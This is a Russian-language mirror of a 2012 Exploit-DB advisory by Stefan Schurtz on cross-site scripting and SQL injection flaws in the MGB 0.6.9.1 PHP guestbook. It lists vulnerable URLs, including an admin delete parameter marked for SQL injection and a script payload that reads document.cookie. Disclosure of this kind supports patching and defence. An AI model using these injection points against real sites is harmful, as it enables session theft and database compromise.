- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37489
- Проверка EDB
-
- Пройдено
- Автор
- STEFAN SCHURTZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2012-07-09
MGB - Multiple Cross-Site Scripting / SQL Injections
Код:
source: https://www.securityfocus.com/bid/54348/info
MGB is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MGB 0.6.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/mgb/admin/admin.php?action=delete&id=[SQLi]&p=1
http://www.example.com/mgb/index.php?p=1â??"</script><script>alert(document.cookie)</script> [XSS]
http://www.example.com/mgb/newentry.php [XSS]
- Источник
- www.exploit-db.com